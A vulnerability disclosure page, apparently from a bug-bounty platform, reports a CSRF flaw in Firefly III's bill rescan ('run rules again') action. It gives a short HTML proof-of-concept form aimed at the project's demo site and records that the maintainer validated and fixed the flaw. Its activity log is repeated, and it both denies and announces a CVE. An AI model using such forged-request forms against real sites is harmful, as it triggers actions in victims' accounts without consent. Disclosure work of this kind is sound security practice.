Cross-Site Request Forgery (CSRF) in firefly-iii/firefly-iii

Valid

Reported on

Oct 23rd 2021

Description

there is a CSRF on Run rules again action

Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.firefly-iii.org/bills/rescan/2">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Occurrences

show.twig L99-L129

ShowController.php L83-L97

We have contacted a member of the firefly-iii team and are waiting to hear back 2 years ago

James Cole validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

James Cole marked this as fixed with commit b42d8d 2 years ago

James Cole has been awarded the fix bounty

This vulnerability will not receive a CVE

show.twig#L99-L129 has been validated

ShowController.php#L83-L97 has been validated

James Cole

commented 2 years ago

Maintainer

Nice find, fixed!

Jamie Slome

commented 2 years ago

Admin

CVE published! 🎊

to join this conversation

We have contacted a member of the firefly-iii team and are waiting to hear back 2 years ago

James Cole validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

James Cole marked this as fixed with commit b42d8d 2 years ago

James Cole has been awarded the fix bounty

This vulnerability will not receive a CVE

show.twig#L99-L129 has been validated

ShowController.php#L83-L97 has been validated

James Cole

commented 2 years ago

Maintainer

Nice find, fixed!

Jamie Slome

commented 2 years ago

Admin

CVE published! 🎊

to join this conversation